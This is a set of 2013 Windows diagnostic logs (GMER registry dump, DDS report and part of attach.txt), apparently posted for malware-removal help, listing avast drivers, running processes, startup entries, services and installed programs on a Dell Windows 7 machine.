Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@ErrorControl                                                                                                                                            1
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@DisplayName                                                                                                                                             aswRdr
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@Group                                                                                                                                                   PNP_TDI
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@DependOnService                                                                                                                                         tcpip?
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@Description                                                                                                                                             avast! WFP Redirect driver
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@ImagePath                                                                                                                                               \SystemRoot\System32\Drivers\aswrdr2.sys
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr\Parameters (not active ControlSet)                                                                                                                      
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr\Parameters@MSIgnoreLSPDefault                                                                                                                           
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr\Parameters@WSIgnoreLSPDefault                                                                                                                           nl_lsp.dll,imon.dll,xfire_lsp.dll,mslsp.dll,mssplsp.dll,cwhook.dll,spi.dll,bmnet.dll,winsflt.dll
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt@Type                                                                                                                                                   1
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt@Start                                                                                                                                                  0
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt@ErrorControl                                                                                                                                           1
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt@DisplayName                                                                                                                                            aswRvrt
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt@Description                                                                                                                                            avast! Revert
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt\Parameters (not active ControlSet)                                                                                                                     
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt\Parameters@BootCounter                                                                                                                                 14
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt\Parameters@TickCounter                                                                                                                                 3373043
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt\Parameters@SystemRoot                                                                                                                                  \Device\Harddisk0\Partition3\Windows
Reg      HKLM\SYSTEM\ControlSet002\services\aswRvrt\Parameters@ImproperShutdown                                                                                                                            1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@Type                                                                                                                                                    2
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@Start                                                                                                                                                   1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@ErrorControl                                                                                                                                            1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@DisplayName                                                                                                                                             aswSnx
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@Group                                                                                                                                                   FSFilter Virtualization
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@DependOnService                                                                                                                                         FltMgr?
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@Description                                                                                                                                             avast! virtualization driver (aswSnx)
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx@Tag                                                                                                                                                     2
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Instances (not active ControlSet)                                                                                                                       
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Instances@DefaultInstance                                                                                                                               aswSnx Instance
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Instances\aswSnx Instance (not active ControlSet)                                                                                                       
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Instances\aswSnx Instance@Altitude                                                                                                                      137600
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Instances\aswSnx Instance@Flags                                                                                                                         0
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Parameters (not active ControlSet)                                                                                                                      
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Parameters@ProgramFolder                                                                                                                                \DosDevices\C:\Program Files\AVAST Software\Avast
Reg      HKLM\SYSTEM\ControlSet002\services\aswSnx\Parameters@DataFolder                                                                                                                                   \DosDevices\C:\ProgramData\AVAST Software\Avast
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP@Type                                                                                                                                                     1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP@Start                                                                                                                                                    1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP@ErrorControl                                                                                                                                             1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP@DisplayName                                                                                                                                              aswSP
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP@Description                                                                                                                                              avast! Self Protection
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP\Parameters (not active ControlSet)                                                                                                                       
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP\Parameters@BehavShield                                                                                                                                   1
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP\Parameters@ProgramFolder                                                                                                                                 \DosDevices\C:\Program Files\AVAST Software\Avast
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP\Parameters@DataFolder                                                                                                                                    \DosDevices\C:\ProgramData\AVAST Software\Avast
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP\Parameters@ProgramFilesFolder                                                                                                                            \DosDevices\C:\Program Files
Reg      HKLM\SYSTEM\ControlSet002\services\aswSP\Parameters@GadgetFolder                                                                                                                                  \DosDevices\C:\Program Files\Windows Sidebar\Shared Gadgets\aswSidebar.gadget
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@Type                                                                                                                                                    1
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@Start                                                                                                                                                   1
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@ErrorControl                                                                                                                                            1
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@DisplayName                                                                                                                                             avast! Network Shield Support
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@Group                                                                                                                                                   PNP_TDI
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@DependOnService                                                                                                                                         tcpip?
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@Description                                                                                                                                             avast! Network Shield TDI driver
Reg      HKLM\SYSTEM\ControlSet002\services\aswTdi@Tag                                                                                                                                                     12
Reg      HKLM\SYSTEM\ControlSet002\services\aswVmm@Type                                                                                                                                                    1
Reg      HKLM\SYSTEM\ControlSet002\services\aswVmm@Start                                                                                                                                                   3
Reg      HKLM\SYSTEM\ControlSet002\services\aswVmm@ErrorControl                                                                                                                                            1
Reg      HKLM\SYSTEM\ControlSet002\services\aswVmm@DisplayName                                                                                                                                             aswVmm
Reg      HKLM\SYSTEM\ControlSet002\services\aswVmm@Description                                                                                                                                             avast! VM Monitor
Reg      HKLM\SYSTEM\ControlSet002\services\aswVmm\Parameters (not active ControlSet)                                                                                                                      
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@Type                                                                                                                                          32
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@Start                                                                                                                                         2
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@ErrorControl                                                                                                                                  1
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@ImagePath                                                                                                                                     "C:\Program Files\AVAST Software\Avast\AvastSvc.exe"
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@DisplayName                                                                                                                                   avast! Antivirus
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@Group                                                                                                                                         ShellSvcGroup
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@DependOnService                                                                                                                               aswMonFlt?RpcSS?
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@WOW64                                                                                                                                         1
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@ObjectName                                                                                                                                    LocalSystem
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@ServiceSidType                                                                                                                                1
Reg      HKLM\SYSTEM\ControlSet002\services\avast! Antivirus@Description                                                                                                                                   Manages and implements avast! antivirus services for this computer. This includes the resident protection, the virus chest and the scheduler.
Reg      HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted@C:\Users\Vincent\AppData\Local\Logitech\xae Webcam Software\Logishrd\LU2.0\LogitechUpdate.exe  1

---- EOF - GMER 2.1 ----


=========== dds.txt ===========

DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 10.0.9200.16576
Run by Vincent at 21:44:22 on 2013-05-17
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.5943.4078 [GMT -5:00]
.
AV: avast! Antivirus *Disabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
SP: avast! Antivirus *Disabled/Updated* {904CF271-6431-DA47-5FCE-A87D98DFB681}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\Dell\DellDock\DockLogin.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DTSRVC.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Program Files (x86)\Common Files\Portrait Displays\Drivers\pdisrvc.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Program Files (x86)\Secunia\PSI\PSIA.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\WUDFHost.exe
C:\Program Files (x86)\Secunia\PSI\sua.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Microsoft Device Center\itype.exe
C:\Program Files\Microsoft Device Center\ipoint.exe
C:\Program Files (x86)\Secunia\PSI\psi_tray.exe
C:\Program Files\Dell\DellDock\DellDock.exe
C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
C:\Program Files (x86)\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\Program Files (x86)\Roxio\Roxio Burn\RoxioBurnLauncher.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
C:\Program Files (x86)\Acer Display\eDisplay Management\DTHtml.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\AirPort\APAgent.exe
C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
C:\Program Files (x86)\Common Files\Portrait Displays\Shared\HookManager.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\Common Files\Portrait Displays\Drivers\pdiSdkHelperx64.exe
C:\Program Files (x86)\Portrait Displays\Pivot Pro Plugin\wpctrl.exe
C:\Program Files (x86)\Portrait Displays\Pivot Pro Plugin\floater.exe
C:\Program Files (x86)\Common Files\Logishrd\LQCVFX\COCIManager.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\system32\igfxext.exe
C:\Windows\System32\svchost.exe -k secsvcs
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Users\Vincent\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Vincent\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Vincent\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Users\Vincent\AppData\Local\Google\Chrome\Application\chrome.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\SysWOW64\ctfmon.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uURLSearchHooks: {2e9331d0-b42b-42b7-9824-a6545d0ceaa6} - <orphaned>
mWinlogon: Userinit = userinit.exe,
BHO: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - <orphaned>
BHO: avast! WebRep: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - 
TB: avast! WebRep: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
uRun: [Google Update] "C:\Users\Vincent\AppData\Local\Google\Update\GoogleUpdate.exe" /c
mRun: [ShwiconXP9106] C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
mRun: [PDVDDXSrv] "C:\Program Files (x86)\CyberLink\PowerDVD DX\PDVDDXSrv.exe"
mRun: [Desktop Disc Tool] "c:\Program Files (x86)\Roxio\Roxio Burn\RoxioBurnLauncher.exe"
mRun: [PivotSoftware] "C:\Program Files (x86)\Portrait Displays\Pivot Pro Plugin\Pivot_startup.exe" -delay=10
mRun: [DT ACR] C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DT_startup.exe -ACR
mRun: [avast] "C:\Program Files\AVAST Software\Avast\avastUI.exe" /nogui
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [LWS] C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe -hide
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [AirPort Base Station Agent] "C:\Program Files (x86)\AirPort\APAgent.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
StartupFolder: C:\Users\Vincent\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\DELLDO~1.LNK - C:\Program Files\Dell\DellDock\DellDock.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\SECUNI~1.LNK - C:\Program Files (x86)\Secunia\PSI\psi_tray.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
TCP: NameServer = 209.18.47.61 209.18.47.62
TCP: Interfaces\{7B6E9E3E-35B2-4192-9038-6C2AABAE4735} : DHCPNameServer = 209.18.47.61 209.18.47.62
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
x64-BHO: avast! WebRep: {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll
x64-BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
x64-TB: avast! WebRep: {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [IntelliType Pro] "c:\Program Files\Microsoft Device Center\itype.exe"
x64-Run: [IntelliPoint] "c:\Program Files\Microsoft Device Center\ipoint.exe"
x64-DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_45-windows-i586.cab
x64-DPF: {CAFEEFAC-0016-0000-0045-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_45-windows-i586.cab
x64-DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_45-windows-i586.cab
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 aswRvrt;aswRvrt;C:\Windows\System32\drivers\aswRvrt.sys [2013-4-1 65336]
R0 PxHlpa64;PxHlpa64;C:\Windows\System32\drivers\PxHlpa64.sys [2010-11-30 55280]
R1 aswSnx;aswSnx;C:\Windows\System32\drivers\aswSnx.sys [2011-10-12 1025808]
R1 aswSP;aswSP;C:\Windows\System32\drivers\aswSP.sys [2011-10-12 377920]
R2 aswFsBlk;aswFsBlk;C:\Windows\System32\drivers\aswFsBlk.sys [2011-10-12 33400]
R2 aswMonFlt;aswMonFlt;C:\Windows\System32\drivers\aswMonFlt.sys [2011-10-12 80816]
R2 avast! Antivirus;avast! Antivirus;C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2013-4-1 45248]
R2 DockLoginService;Dock Login Service;C:\Program Files\Dell\DellDock\DockLogin.exe [2009-6-9 155648]
R2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [2013-5-17 418376]
R2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [2013-5-17 701512]
R2 PdiService;Portrait Displays SDK Service;C:\Program Files (x86)\Common Files\Portrait Displays\Drivers\pdisrvc.exe [2011-6-25 109168]
R2 Secunia PSI Agent;Secunia PSI Agent;C:\Program Files (x86)\Secunia\PSI\psia.exe [2011-1-10 993848]
R2 Secunia Update Agent;Secunia Update Agent;C:\Program Files (x86)\Secunia\PSI\sua.exe [2011-1-10 399416]
R3 HECIx64;Intel(R) Management Engine Interface;C:\Windows\System32\drivers\HECIx64.sys [2010-11-30 56344]
R3 IntcDAud;Intel(R) Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2010-11-30 271872]
R3 k57nd60a;Broadcom NetLink (TM) Gigabit Ethernet - NDIS 6.0;C:\Windows\System32\drivers\k57nd60a.sys [2010-11-30 321064]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2013-5-17 25928]
R3 PSI;PSI;C:\Windows\System32\drivers\psi_mf.sys [2010-9-1 17976]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-3-18 138576]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-4-19 161384]
S3 aswVmm;aswVmm;C:\Windows\System32\drivers\aswVmm.sys [2013-4-1 178624]
S3 Impcd;Impcd;C:\Windows\System32\drivers\Impcd.sys [2010-11-30 158976]
S3 LVRS64;Logitech RightSound Filter Driver;C:\Windows\System32\drivers\lvrs64.sys [2012-1-18 351136]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2011-7-1 59392]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-7-9 52736]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2010-12-26 1255736]
.
=============== Created Last 30 ================
.
2013-05-18 01:41:36 --------    d-----w-    C:\Users\Vincent\AppData\Roaming\Malwarebytes
2013-05-18 01:41:27 --------    d-----w-    C:\ProgramData\Malwarebytes
2013-05-18 01:41:26 25928   ----a-w-    C:\Windows\System32\drivers\mbam.sys
2013-05-18 01:41:26 --------    d-----w-    C:\Program Files (x86)\Malwarebytes' Anti-Malware
2013-05-18 01:41:05 --------    d-----w-    C:\Users\Vincent\AppData\Local\Programs
2013-05-17 23:16:26 --------    d-----w-    C:\Program Files (x86)\Free Window Registry Repair
2013-05-17 23:15:02 388096  ----a-r-    C:\Users\Vincent\AppData\Roaming\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2013-05-17 23:15:01 --------    d-----w-    C:\Program Files (x86)\Trend Micro
2013-05-17 19:12:14 --------    d-----r-    C:\Program Files (x86)\Skype
2013-05-17 16:02:11 9460464 ----a-w-    C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{F70E6934-0AF8-479E-A557-6A665C951823}\mpengine.dll
2013-05-15 08:00:59 1767424 ----a-w-    C:\Windows\SysWow64\wininet.dll
2013-05-15 08:00:57 2242048 ----a-w-    C:\Windows\System32\wininet.dll
2013-05-07 08:03:22 9728    ---ha-w-    C:\Windows\SysWow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2013-05-04 21:31:56 737072  ----a-w-    C:\ProgramData\Microsoft\eHome\Packages\SportsV2\SportsTemplateCore\Microsoft.MediaCenter.Sports.UI.dll
2013-05-04 21:31:36 2876528 ----a-w-    C:\ProgramData\Microsoft\eHome\Packages\MCEClientUX\UpdateableMarkup\markup.dll
2013-05-04 21:31:08 42776   ----a-w-    C:\ProgramData\Microsoft\eHome\Packages\MCEClientUX\dSM\StartResources.dll
2013-05-04 21:30:59 539984  ----a-w-    C:\ProgramData\Microsoft\eHome\Packages\MCESpotlight\MCESpotlight\SpotlightResources.dll
2013-05-02 00:35:14 --------    d-----w-    C:\Users\Vincent\AppData\Roaming\.minecraft
2013-04-28 00:10:28 --------    d-----w-    C:\Program Files (x86)\AirPort
2013-04-23 22:06:10 1656680 ----a-w-    C:\Windows\System32\drivers\ntfs.sys
.
==================== Find3M  ====================
.
2013-05-15 05:05:10 71048   ----a-w-    C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2013-05-15 05:05:10 692104  ----a-w-    C:\Windows\SysWow64\FlashPlayerApp.exe
2013-05-07 08:03:22 9728    ---ha-w-    C:\Windows\System32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2013-05-05 22:36:15 545200  ----a-w-    C:\Windows\System32\npdeployJava1.dll
2013-05-05 22:36:15 526768  ----a-w-    C:\Windows\System32\deployJava1.dll
2013-05-02 07:06:08 278800  ------w-    C:\Windows\System32\MpSigStub.exe
2013-04-13 05:49:23 135168  ----a-w-    C:\Windows\apppatch\AppPatch64\AcXtrnal.dll
2013-04-13 05:49:19 350208  ----a-w-    C:\Windows\apppatch\AppPatch64\AcLayers.dll
2013-04-13 05:49:19 308736  ----a-w-    C:\Windows\apppatch\AppPatch64\AcGenral.dll
2013-04-13 05:49:19 111104  ----a-w-    C:\Windows\apppatch\AppPatch64\acspecfc.dll
2013-04-13 04:45:16 474624  ----a-w-    C:\Windows\apppatch\AcSpecfc.dll
2013-04-13 04:45:15 2176512 ----a-w-    C:\Windows\apppatch\AcGenral.dll
2013-04-10 06:01:54 265064  ----a-w-    C:\Windows\System32\drivers\dxgmms1.sys
2013-04-10 06:01:53 983400  ----a-w-    C:\Windows\System32\drivers\dxgkrnl.sys
2013-04-10 03:30:50 3153920 ----a-w-    C:\Windows\System32\win32k.sys
2013-04-08 22:00:05 796672  ----a-w-    C:\Windows\GPInstall.exe
2013-04-05 06:50:36 3958784 ----a-w-    C:\Windows\System32\jscript9.dll
2013-04-05 06:50:31 67072   ----a-w-    C:\Windows\System32\iesetup.dll
2013-04-05 06:50:31 136704  ----a-w-    C:\Windows\System32\iesysprep.dll
2013-04-05 05:26:26 2877440 ----a-w-    C:\Windows\SysWow64\jscript9.dll
2013-04-05 05:26:21 61440   ----a-w-    C:\Windows\SysWow64\iesetup.dll
2013-04-05 05:26:21 109056  ----a-w-    C:\Windows\SysWow64\iesysprep.dll
2013-04-05 04:43:00 2706432 ----a-w-    C:\Windows\System32\mshtml.tlb
2013-04-05 04:29:45 2706432 ----a-w-    C:\Windows\SysWow64\mshtml.tlb
2013-04-05 03:51:11 89600   ----a-w-    C:\Windows\System32\RegisterIEPKEYs.exe
2013-04-05 03:38:25 71680   ----a-w-    C:\Windows\SysWow64\RegisterIEPKEYs.exe
2013-03-19 06:04:06 5550424 ----a-w-    C:\Windows\System32\ntoskrnl.exe
2013-03-19 05:53:58 48640   ----a-w-    C:\Windows\System32\wwanprotdim.dll
2013-03-19 05:53:58 230400  ----a-w-    C:\Windows\System32\wwansvc.dll
2013-03-19 05:46:56 43520   ----a-w-    C:\Windows\System32\csrsrv.dll
2013-03-19 05:04:13 3968856 ----a-w-    C:\Windows\SysWow64\ntkrnlpa.exe
2013-03-19 05:04:10 3913560 ----a-w-    C:\Windows\SysWow64\ntoskrnl.exe
2013-03-19 04:47:50 6656    ----a-w-    C:\Windows\SysWow64\apisetschema.dll
2013-03-19 03:06:33 112640  ----a-w-    C:\Windows\System32\smss.exe
2013-03-06 22:33:21 70992   ----a-w-    C:\Windows\System32\drivers\aswRdr2.sys
2013-03-06 22:33:21 65336   ----a-w-    C:\Windows\System32\drivers\aswRvrt.sys
2013-03-06 22:33:21 178624  ----a-w-    C:\Windows\System32\drivers\aswVmm.sys
2013-03-06 22:33:21 1025808 ----a-w-    C:\Windows\System32\drivers\aswSnx.sys
2013-03-06 22:33:20 80816   ----a-w-    C:\Windows\System32\drivers\aswMonFlt.sys
2013-03-06 22:32:51 41664   ----a-w-    C:\Windows\avastSS.scr
2013-03-06 09:31:21 477616  ----a-w-    C:\Windows\SysWow64\npdeployJava1.dll
2013-03-06 09:31:21 473520  ----a-w-    C:\Windows\SysWow64\deployJava1.dll
2013-02-27 06:02:44 111448  ----a-w-    C:\Windows\System32\consent.exe
2013-02-27 05:48:00 1930752 ----a-w-    C:\Windows\System32\authui.dll
2013-02-27 05:47:10 70144   ----a-w-    C:\Windows\System32\appinfo.dll
2013-02-27 04:49:24 1796096 ----a-w-    C:\Windows\SysWow64\authui.dll
.
============= FINISH: 21:44:46.59 ===============



======= attach.txt ========

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Home Premium 
Boot Device: \Device\HarddiskVolume2
Install Date: 12/12/2010 12:52:02 PM
System Uptime: 5/17/2013 9:35:16 PM (0 hours ago)
.
Motherboard: Dell Inc. |  | 0C2KJT
Processor: Intel(R) Core(TM) i3 CPU         550  @ 3.20GHz | CPU 1 | 3200/133mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 923 GiB total, 865.713 GiB free.
D: is CDROM ()
E: is Removable
F: is Removable
G: is Removable
H: is Removable
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP527: 5/10/2013 3:00:11 AM - Windows Update
RP528: 5/11/2013 3:00:11 AM - Windows Update
RP529: 5/12/2013 3:00:16 AM - Windows Update
RP530: 5/13/2013 3:00:11 AM - Windows Update
RP531: 5/14/2013 3:00:11 AM - Windows Update
RP532: 5/15/2013 3:00:13 AM - Windows Update
RP533: 5/16/2013 3:00:12 AM - Windows Update
RP534: 5/17/2013 3:00:11 AM - Windows Update
RP535: 5/17/2013 2:20:56 PM - Windows Update
RP536: 5/17/2013 3:23:57 PM - Windows Update
RP537: 5/17/2013 3:48:22 PM - Windows Update
RP538: 5/17/2013 5:42:17 PM - Windows Update
RP539: 5/17/2013 6:14:45 PM - Installed HiJackThis
RP540: 5/17/2013 6:38:56 PM - Removed TheSkyX First Light Edition.
RP541: 5/17/2013 6:39:54 PM - Removed TONKA Search & Rescue 2
.
==== Installed Programs ======================
.
4 Elements
Acer eDisplay Management
Adobe AIR
Adobe Flash Player 11 ActiveX
Adobe Flash Player 11 Plugin
Adobe Reader XI (11.0.03)
Adobe Shockwave Player 12.0
AirPort
Apple Application Support
